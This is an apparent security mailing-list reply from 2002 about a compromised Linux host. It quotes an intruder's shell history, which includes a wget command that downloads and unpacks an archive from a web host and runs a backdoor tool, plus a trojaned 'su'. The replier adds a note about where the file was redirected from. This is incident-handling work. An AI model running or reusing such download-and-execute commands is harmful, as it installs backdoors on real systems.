At 12/16/2002 10:47 AM, Damian Gerow wrote:
Left in the .bash_history was this:
w
cd /tmp
wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
./epc
A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.
I've already notified Geocities abuse, and haven't heard back from them
yet.
Note that the file does not appear to be stored on the Geocities site; the Geocities site redirects to http://www.djteckh.com/loc.tgz, which is a Yahoo domain.
Michael Katz mike@xxxxxxxxxxxx Procinct Security ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com